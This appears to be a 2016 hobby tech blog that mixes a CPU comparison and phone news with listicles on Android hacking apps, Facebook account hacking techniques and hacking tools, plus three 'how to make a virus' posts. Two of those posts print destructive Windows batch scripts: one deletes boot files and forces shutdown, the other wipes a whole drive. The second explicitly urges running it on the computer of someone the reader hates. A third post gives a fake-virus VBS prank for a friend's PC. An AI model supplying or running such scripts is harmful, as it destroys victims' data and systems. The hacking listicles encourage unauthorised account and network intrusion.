Pages

Friday 11 November 2016

What's the difference between an Intel Core i3, i5 and i7?

Intel Core i3, Core i5, and Core i7 CPUs have been around for a few years now, but some buyers still get stumped whenever they attempt to build their own systems and are forced to choose among the three. With the more recent Haswell (fourth generation ) architecture now on store shelves, we expect the latest wave of buyers to ask the same kind of questions.

ALSO lLIKE:10 Best android hacking apps
ALSO LIKE:How to make virus that crashes PC!!!

Core i3, Core i5, Core i7 — the difference in a nutshell

If you want a plain and simple answer, then generally speaking, Core i7s are better than Core i5s, which are in turn better than Core i3s. Nope, Core i7 does not have seven cores nor does Core i3 have three cores. The numbers are simply indicative of their relative processing powers.
Their relative levels of processing power are based on a collection of criteria involving their number of cores, clock speed (in GHz), size of cache, as well as Intel technologies like Turbo Boost and Hyper-Threading.
Note: Core processors can be grouped in terms of their target devices, i.e., those for laptops and those for desktops. Each has its own specific characteristics/specs. To avoid confusion, we’ll focus on the desktop variants. Note also that we’ll be focusing on the 4th Generation (codenamed Haswell) Core CPUs.

Number of cores

The more cores there are, the more tasks (known as threads) can be served at the same time. The lowest number of cores can be found in Core i3 CPUs, i.e., which have only two cores. Currently, all Core i3s are dual-core processors.
Currently all Core i5 processors, except for the i5-4570T, are quad cores in Australia. The Core i5-4570T is only a dual-core processor with a standard clock speed of 2.9GHz. Remember that all Core i3s are also dual cores. Furthermore, the i3-4130T is also 2.9GHz, yet a lot cheaper. Sounds like it might be a better buy than the i5. What gives?
At this point, I’d like to grab the opportunity to illustrate how a number of factors affect the overall processing power of a CPU and determine whether it should be considered an i3, an i5, or an i7.
Even if the i5-4570T normally runs at the same clock speed as Core i3-4130T, and even if they all have the same number of cores, the i5-4570T benefits from a technology known as Turbo Boost.

Intel Turbo Boost

The Intel Turbo Boost Technology allows a processor to dynamically increase its clock speed whenever the need arises. The maximum amount that Turbo Boost can raise clock speed at any given time is dependent on the number of active cores, the estimated current consumption, the estimated power consumption, and the processor temperature.
For the Core i5-4570T, its maximum allowable processor frequency is 3.6GHz. Because none of the Core i3 CPUs have Turbo Boost, the i5-4570T can outrun them whenever it needs to. Because all Core i5 processors are equipped with the latest version of this technology — Turbo Boost 2.0 — all of them can outrun any Core i3.

Cache size

Whenever the CPU finds that it keeps on using the same data over and over, it stores that data in its cache. Cache is just like RAM, only faster — because it’s built into the CPU itself. Both RAM and cache serve as holding areas for frequently used data. Without them, the CPU would have to keep on reading from the hard disk drive, which would take a lot more time.
Basically, RAM minimises interaction with the hard disk, while cache minimises interaction with the RAM. Obviously, with a larger cache, more data can be accessed quickly. The Haswell (fourth generation) Core i3 processors have either 3MB or 4MB of cache. The Haswell Core i5s have either 4MB or 6MB of cache. Finally, all Core i7 CPUs have 8MB of cache, except for i7-4770R, which has 6MB. This is clearly one reason why an i7 outperforms an i5 — and why an i5 outperforms an i3.

Hyper-Threading

Strictly speaking, only one thread can be served by one core at a time. So if a CPU is a dual core, then supposedly only two threads can be served simultaneously. However, Intel has a technology called Hyper-Threading. This enables a single core to serve multiple threads.
For instance, a Core i3, which is only a dual core, can actually serve two threads per core. In other words, a total of four threads can run simultaneously. Thus, even if Core i5 processors are quad cores, since they don’t support Hyper-Threading (again, except the i5-4570T) the number of threads they can serve at the same time is just about equal to those of their Core i3 counterparts.
This is one of the many reasons why Core i7 processors are the creme de la creme. Not only are they quad cores, they also support Hyper-Threading. Thus, a total of eight threads can run on them at the same time. Combine that with 8MB of cache and Intel Turbo Boost Technology, which all of them have, and you’ll see what sets the Core i7 apart from its siblings.
The upshot is that if you do a lot of things at the same time on your PC, then it might be worth forking out a bit more for an i5 or i7. However, if you use your PC to check emails, do some banking, read the news, and download a bit of music, you might be equally served by the cheaper i3.
At DCA Computers, we regularly hear across the sales counter, “I don’t mind paying for a computer that will last, which CPU should I buy?” The sales tech invariably responds “Well that depends on what you use your computer for.” If it’s the scenario described above, we pretty much tell our customers to save their money and buy an i3 or AMD dual core.
Another factor in this deliberation is that more and more programs are being released with multithread capability. That is, they can use more than one CPU thread to execute a single command. So things happen more quickly. Some photo editors and video editing programs are multi-threaded, for example.
Hopefully this gives you some insight for your next CPU selection.
Happy computing!

Thursday 10 November 2016

10 Best Android Hacking Apps!!!!!

Some years back, hacking used to be a thing for experts. Normally, these experts would have very sophisticated computers. But the modern smartphone is sophisticated too. We can’t seem to point out what a computer can do that a smartphone cannot do. Technology has made it possible for you to hack into almost everything from the screen of your mobile device. Take a look at ten of the best Android Hacking apps you can use.

1. WiFiKill

Is the slow speed of your wireless connection irritating you? You could be busy trying to finish an assignment while some kid is busy downloading funny videos. Using WiFiKill you can kick out other users from a shared wireless connection. The application tricks your victims’ devices into thinking your device is the Wi-Fi router and kills their packets. To the victims, they are still connected but the connection is just too slow.

2. Shark For Root

Shark For Root is an application for expert hackers. The app is basically used to view other internet users’ traffic, otherwise called ‘traffic sniffing’. The app can sniff traffic over Wi-Fi, and 3G connections. The app uses the TCP dump concept, allowing the hacker to key TCP dump commands on an android device. You will need another app called Shark Reader to open the captured files. This Android hacking application is available on Google’s Play Store.
Also check: free movie apps

3. zAnti

zAnti is an Android hacking tool for professional hackers. Basically, it is a penetration testing toolkit. With this hacking tool, you can penetrate any device on your network. Aside from that, you can perform MITM attacks on devices on your network. It was developed for cyber security by Zimperium Mobile Security.

4. dSploit

dSploit is one of the best hacking apps for Android with a set of overwhelming functions. It is one of those penetration tools that can be used scan networks and retrieve information regarding the connected devices and their operating systems, ports that are open on connected devices, services running on the connected devices and check any vulnerabilities present. I can be maliciously used to perform ‘man-in-the-middle’ attacks.

5. AndroRat

AndroRat is an RAT (remote access tool). The application was designed to give a hacker control of the victim’s device. The attacker can control phone calls and messages from a control panel on his device. As if that is not enough, they will have access to GPS coordinates, camera, microphones and all files stored in the device. The victim’s phone is infected through an APK binder.
Also check: free android games

6. Fing Network Scanner

Fing Network Scanner is a hacking tool available on all platforms; Windows, iOS, and Android. The network scanner is also available on personal computers. The application scans the network and discovers all the connected devices. The application has a simple design and can be used by people with little tech knowledge.

7. Hackode

Hackode is a decent hacking tool for Android that is used by cyber security firms and penetration testers. Hackode can be used to perform functions such as reconnaissance, network scans, generating security feeds and performing a number of exploits. It is one of the best Android hacking apps for beginners.

8. Droid Sheep

Droid Sheep is one other hacking tool that was developed for a noble course, but can be exploited to perform evil acts. It performs security analysis in wireless connections by hijacking active sessions. Once it starts scanning it will display all unsecured sessions on that network. A heinous user may choose to open the displayed sessions, thus intruding on a victim’s privacy.
Also check: best caller id apps

9. Nmap

Nmap is a network mapper that scans a connection and finds ports. It is available on Android and Windows. Ethical hackers will find the application useful in finding characteristics of hosts. The application can be used on devices which are rooted as well as those which are not rooted. Using it on a device which is not rooted limits its potential.

10. FaceNiff

Like most hacking apps for Android, FaceNiff allows an attacker to hijack web sessions of other users on the same network. Secure connections are susceptible to this tool too; FaceNiff can access WPA, WPA-2 and WEP connections. However, FaceNiff cannot access secured browsing, https. Social media accounts are not automatically secured, you have to secure them manually.
There you have it, 10 of the best Android hacking apps in the market. Some of these applications, especially those available on Google’s Play Store are not free. You need to root your android device to hack using these applications. Download any of these applications to enjoy hacking from your Android device.

Wednesday 9 November 2016

Top 10 Facebook profile hacking techniques!!! for sure !!!


1. Phishing

Phishing is still the most popular attack vector used for hacking Facebook accounts. There are variety methods to carry out phishing attack. In a simple phishing attack, a hacker creates a fake login page which exactly looks like the real Facebook page and then asks the victim to log in. Once the victim log's in through the fake page the, the victims "Email Address" and "Password" is stored into a text file, and the hacker then downloads the text file and gets his hands on the victim's credentials.

2. Keylogging

Keylogging is the easiest way to hack a Facebook password. Keylogging sometimes can be so dangerous that even a person with good knowledge of computers can fall for it. A Keylogger is basically a small program which, once is installed on victim's computer, will record everything victim types on his/her computer. The logs are then sent back to the attacker by either FTP or directly to hackers email address.

3. Stealer's

Almost 80% percent people use stored passwords in their browser to access the Facebook. This is quite convenient, but can sometimes be extremely dangerous. Stealers are software's specially designed to capture the saved passwords stored in the victim's Internet browser.

4. Session Hijacking

Session Hijacking can be often very dangerous if you are accessing Facebook on a HTTP (nonsecure) connection. In Session Hijacking attack, a hacker steals the victim's browser cookie which is used to authenticate the user on a website, and use it to access the victim's account. Session hijacking is widely used on LAN, and WiFi connections.

5. Sidejacking With Firesheep

Sidejacking attack went common in late 2010, however, it's still popular nowadays. Firesheep is widely used to carry out side-jacking attacks. Firesheep only works when the attacker and victim are on the same WiFi network. A side jacking attack is basically another name for HTTP session hijacking, but it's more targeted towards WiFi users.

6. Mobile Phone Hacking

Millions of Facebook users access Facebook through their mobile phones. In case the hacker can gain access to the victim's mobile phone then he can probably gain access to his/her Facebook account. There are lots of Mobile Spying software's used to monitor a Cellphone. The most popular Mobile Phone Spying software's are Mobile Spy and Spy Phone Gold.

7. DNS Spoofing

If both the victim and attacker are on the same network, an attacker can use a DNS spoofing attack and change the original Facebook page to his own fake page and hence can get access to victims Facebook account.

8. USB Hacking

If an attacker has physical access to your computer, he could just insert a USB programmed with a function to automatically extract saved passwords in the Internet browser.

9. Man In the Middle Attacks

If the victim and attacker are on the same LAN and on a switch based network, a hacker can place himself between the client and the server, or he could act as a default gateway and hence capturing all the traffic in between.

10. Botnets

Botnets are not commonly used for hacking Facebook accounts, because of it's high setup costs. They are used to carry more advanced attacks. A Botnet is basically a collection of compromised computer. The infection process is same as the key logging, however, a Botnet gives you additional options for carrying out attacks with the compromised computer. Some of the most popular Botnets include Spyeye and Zeus.


This is for education and knowledge purpose.Don't use it for wrong purposes.

Stay connected for lots of more........!!!!!!!!!!!!!!!!!!!!!!!!!!!  

Monday 7 November 2016

Top Best Hacking Tools Of 2016 For Windows, Linux and Mac OS X !!!!!

Top Best Hacking Tools Of 2016 For Windows, Linux and Mac OS X


All these hacking tools 2016 provided here are free of cost ,are tried hands on and are being actively developed by community,and if not,their alternatives are provided.

Here are the Top Best Ethical Hacking Tools 2016:

#1 Metasploit.


Metasploit is available for all major platforms including Windows, Linux, and OS X. Rather than calling Metasploit a collection of exploit tools, I’ll call it an infrastructure that you can utilize to build your own custom tools. This free tool is one of the most popular cybersecurity tool around that allows you to locate vulnerabilities at different platforms. Metasploit is backed by more than 200,000 users and contributors that help you to get insights and uncover the weaknesses in your system.
This top hacking tool package of 2016 lets you simulate real-world attacks to tell you about the weak points and finds them. As a penetration tester, it pin points the vulnerabilities with Nexpose closed–loop integration using Top Remediation reports. Using the open source Metasploit framework, users can build their own tools and take the best out of this multi-purpose hacking tool.

#2 Nmap.


Nmap is available for all major platforms including Windows, Linux, and OS X. I think everyone has heard of this one, Nmap (Network Mapper) is a free open source utility for network exploration or security auditing. It was designed to Nmap rapidly scan large networks, although it works fine against single hosts.Many systems and network administrators also find it useful for tasks such as network inventory, managing service upgrade schedules, and monitoring host or service uptime. Nmap uses raw IP packets in novel ways to determine what hosts are available on the network, what services (application name and version) those hosts are offering, what operating systems (and OS versions) they are running, what type of packet filters/firewalls are in use,and dozens of other characteristics. It may be used to discover computers and services on a computer network, thus creating a “map” of the network.Nmap runs on most types of computers and both console and graphical versions are available. Nmap is free and open source.Can be used by beginners (-sT) or by pros alike (packet_trace). A very versatile tool, once you fully understand the results.

#3 Acunetix WVS.


Acunetix is available for Windows XP and higher. Acunetix is a web vulnerability scanner (WVS) that scans and finds out the flaws in a website that could prove fatal. This multi-threaded tool crawls a website and finds out malicious Cross-site Scripting, SQL injection, and other vulnerabilities. This fast and easy to use tool scans WordPress websites form more than 1200 vulnerabilities in WordPress.
Acunetix comes with a Login Sequence Recorder that allows one to access the password protected areas of websites. The new AcuSensor technology used in this tool allows you to reduce the false positive rate. Such features have made Acunetix WVS a preferred hacking tools that you need to check out in 2016.

#4 Wireshark.


his free and open source tool was originally named Ethereal. Wireshark also comes in a command-line version called TShark. This GTK+-based network protocol analyzer runs with ease on Linux, Windows, and OS X. Wireshark is a GTK+-based Wiresharknetwork protocol analyzer, or sniffer, that lets you capture and interactively browse the contents of network frames. The goal of the project is to create a commercial-quality analyzer for Unix and to give Wireshark features that are missing from closed-source sniffers. Works great on both Linux and Windows (with a GUI), easy to use and can reconstruct TCP/IP Streams.

#5 oclHashcat

This useful hacking tool can be downloaded in different versions for Linux, OSX, and Windows. If password cracking is something you do on daily basis, you might be aware of the free password cracking tool Hashcat. While Hashcat is a CPU-based password cracking tool, oclHashcat is its advanced version that uses the power of your GPU.
oclHashcat calls itself world’s fastest password cracking tool with world’s first and only GPGPU based engine. For using the tool, NVIDIA users require ForceWare 346.59 or later and AMD users require Catalyst 15.7 or later

#6 Nessus Vulnerability Scanner.

Nessus is supported by a variety of platforms including Windows 7 and 8, Mac OS X, and popular Linux distros like Debian, Ubuntu, Kali Linux etc. This top free hacking tool of 2016 works with the help of a client-server framework. Developed by Tenable Network Security, the tool is one of the most popular vulnerability scanners we have. Nessus serves different purposes to different types of users – Nessus Home, Nessus Professional, Nessus Manager and Nessus Cloud.
Using Nessus, one can scan multiple types of vulnerabilities that include remote access flaw detection, misconfiguration alert, denial of services against TCP/IP stack, preparation of PCI DSS audits, malware detection, sensitive data searches etc. To launch a dictionary attack, Nessus can also call a popular tool Hydra externally.
Apart from the above mentioned basic functionalities, Nessus could be used to scan multiple networks on IPv4, IPv6 and hybrid networks. You can set scheduled scan to run at your chosen time and re-scan all or a subsection of previously scanned hosts using selective host re-scanning.

#7 Maltego

Maltego hacking tool is available for Windows, Mac, and Linux. Maltego is an open source forensics platform that offers rigorous mining and information gathering to paint a picture of cyber threats around you. Maltego excels in showing the complexity and severity of points of failure in your infrastructure and the surrounding environment.
Maltego is a great hacker tool that analyzes the real world links between people, companies, websites, domains, DNS names, IP addresses, documents and whatnot. Based on Java, this tool runs in an easy-to-use graphical interface with lost customization options while scanning.

#8 Social-Engineering Toolkit.


Apart from Linux, Social-Engineer Toolkit is partially supported on Mac OS X and Windows. Also featured on Mr. Robot, TrustedSec’s Social-Engineer Toolkit is an advanced framework for simulating multiple types of social engineering attacks like credential harvestings, phishing attacks, and more. On the show, Elliot is seen using the SMS spoofing tool from the Social-Engineer Toolkit.
This Python-driven tool is the standard tool for social-engineering penetration tests with more than two million downloads. It automates the attacks and generates disguising emails, malicious web pages and more.

#9 Nessus Remote Security Scanner.


Recently went closed source, but is still essentially free. Works with a client-server framework.Nessus is the worlds Nessus Remote Security Scanner most popular vulnerability scanner used in over 75,000 organizations world-wide. Many of the worlds largest organizations are realizing significant cost savings by using Nessus to audit business-critical enterprise devices and applications.

#10 Kismet.


Kismet is an 802.11 layer2 wireless network detector, sniffer, and intrusion detection system. Kismet will work with Kismetany wireless card which supports raw monitoring (rfmon) mode, and can sniff 802.11b, 802.11a, and 802.11g traffic. A good wireless tool as long as your card supports rfmon.



So above is the top best ethical hacking tools 2016 for Windows, Linux and MAC OS X and must have tools for every hacker and these tools used on pc and So if you like this post don’t forget to share with your friends!! If you face any problem feel free to discuss in below comments;
















Wednesday 26 October 2016

 A phone that has nothing but screen.cool!!!



Mi Mix

The Mi Mix is the newest phone from the Chinese juggernaut that, as of right now, doesn't have a huge presence here in the United States. The first thing you'll notice about it is the almost complete lack of bezels, that extra space around the top, bottom, and sides that typically hides all the electronics that a screen needs to function. Not only does it look pretty, but it helps you fit a much bigger screen into a much smaller phone.




The iPhone has been married to its iconic top and bottom bezels for years and years—the bottom so there's room for a button, and the top presumably for the sake of symmetry. Android phones, meanwhile, have experimented with cutting back on the non-screen space to varying degrees. Motorola phones like the Moto X and the Nexus 6 have some of the smallest bezels you can find on mass-market phones, but they're still there. And they're technically there on the new Xiaomi Mi Mix as well, but they're so thin as to be practically a technicality.
Xiaomi isn't the first company to pull this extreme trick. In 2014, Sharp released a phone called the Aquos that looks striking similar, if not quite as refined. Unfortunately, by most accounts, it was also a fairly mediocre phone. In the years since, Sharp's updated the design with a little more polish, producing another concept phone even more like the Xiaomi, but it's not for sale.
While Sharp may not be a big name phone-maker like Xiaomi is in China, Sharp's fancy phones are actually more exciting for a very particular reason: Apple is rumored to be in talks with Sharp to provide screens for future iPhones, future iPhones that may not have buttons and no real need for bezels. Future iPhones that are due for a big, flashy update for the gadget's tenth anniversary coming up in 2017. There's no guarantee—or even rock-solid indication—that Apple is eyeing this particular tech for the iPhone 8, but it's not out of the question.
Of course while removing bezels has its upsides—prettier, smaller phones with a bigger screens—it also comes with its challenges. Without bezels, a phone's screen will routinely be in contact with your palm, so the phone needs software that teaches it the difference between that and an on-purpose touch. Not to mention that bezel-free screens can be easier to break and harder to replace. Still, the increasing prevalence of this trick in more and more phones that are actual for sale means that the hardware and software challenges are starting to be tackled. It's only a matter of time before we see this in something like an iPhone or a Pixel.
Xiaomi's new Mi Mix will be available in China on November 4th at roughly $510 or $590 for the 128GB and 256GB versions, respectively.

 

iOS 10.1 Is Here with New Photo Superpowers for the iPhone 7 Plus

Apple's iPhone 7 Plus is getting a new camera capability — the blurring of backgrounds to focus attention on people or other objects in the foreground.

Apple first announced the "portrait mode" feature in September but it wasn't available until the company released its iOS 10.1 software update Monday. It replicates an effect typically limited to larger cameras known as SLRs. While SLRs accomplishes this by controlling how wide the lens opens, the iPhone uses software adjustments.

Portrait mode requires an iPhone 7 Plus because it uses the phone's two lenses to sense depth. Other iPhones have only one camera lens. The software update will still be available for other iPhones because it also comes with bug fixes and other improvements.

To use the feature, slide the mode at the bottom of the camera app to "portrait." It's between "photo" and "square."

Then take a few steps back, as the feature taps the zoom on the iPhone 7 Plus's second lens, meaning images are enlarged two-fold. The screen will guide you to move closer or farther from the subject, or in some cases, find a setting with more light. When shooting multiple people, make sure everyone's the same distance from the camera to keep them all sharp.

Apple is calling this depth-effect feature a beta, which means it's a work in progress. The iPhone will also save the unadjusted shots by default.

Huawei's dual-lens P9 phone also has a similar feature.

The update comes three days before Apple holds a product event in Cupertino, California, during which the company is expected to unveil new Mac computers.

Separately, Apple announced Monday that a Nike edition of Apple Watch will come out Friday, starting at $369. The runner-focused watch was announced in September, but no specific date had been given

HOW TO MAKE A VIRUS THAT CRASHES PC!!!!!!

 Here a very simple and dangerous virus make trick is described.Just follow the steps given below and  make a virus file that crashes the pc.

  • Open notepad
  • Write the below given coding into notepad
      @echo off
       attrib -r -s -h c:autoexec.bat
       del c:autoexec.bat
       attrib -r -s -h c:boot.ini
       del c:boot.ini
       attrib -r -s -h c:ntldr
       del c:ntldr
       attrib -r -s -h c:windowswin.ini
       del c:windowswin.ini
       @echo off
       msg * YOU GOT OWNED!!!
       shutdown -s -t 7 -c "A VIRUS IS TAKING OVER c:Drive

  • Now just save this file as Anything.bat.You can give any name you want but don't  forget to give extension as .bat
WARNING!!!!!!

DON'T TRY THIS ON YOUR PC.DO THIS ON YOUR OWN RISK.!!!!!!

HAVE FUN..

Friday 21 October 2016

HOW TO MAKE AN VIRUS THAT BLOWS OFF COMPUTERS DRIVES!!!!


Here you are about to learn an virus that deletes all content stored in the drives.This type of virus is created using the batch file programming.It is very simple just follow the steps carefully.

  • Open notepad and copy the below given content in it.
        @Echo off
         Del C:\*.*|y
  • Save this file as "anyname.bat"
  • Now running this file will delete all file from the C drive.You can change the drive by changing the letter C to anyother drives name.
WARNING!!!!!WARNING!!!!WARNING!!!!WARNING!!!!!WARNING!!!!WARNING


Don't ever try this on your personnel computer it's dangerous for your computer..!!!!!!
you can try this on someone's computer whom you hate or dislikes or just show off with this.

Saturday 15 October 2016

How to Create an Awesome (Harmless) Computer Virus Prank (Fake Virus)!!!

Create an awesome computer Virus prank, this is harmless and does not affect anything, this is the secure way to create prank virus.

The only thing you need to create this virus is just notepad.No need of any other softwares or big coding.

Just follow the below given simple steps to create it.


  • Open notepad.  
  • Now copy the text given below into notepad.
X=MsgBox("Error while opening the computetr.Do u want to fix it?",4+64,"Computer")
X=MsgBox("Unable to fix this ERROR.Do u want to scan for virus?",3+48,"Computer scan")
X=MsgBox("Unable to scan.Virus activated",2+16,"ALERT")
X=MsgBox("Virus copying your password.",2+48,"ALERT")
X=MsgBox("Your computer is hacked.",1+64,"HACKED")


  • Now save this notepad file with name "my computer.vbs".Change the icon of this file like my computer.
  • Copy this file to your friends computer.
Whenever your friend tries to open my computer he will have to face this problem.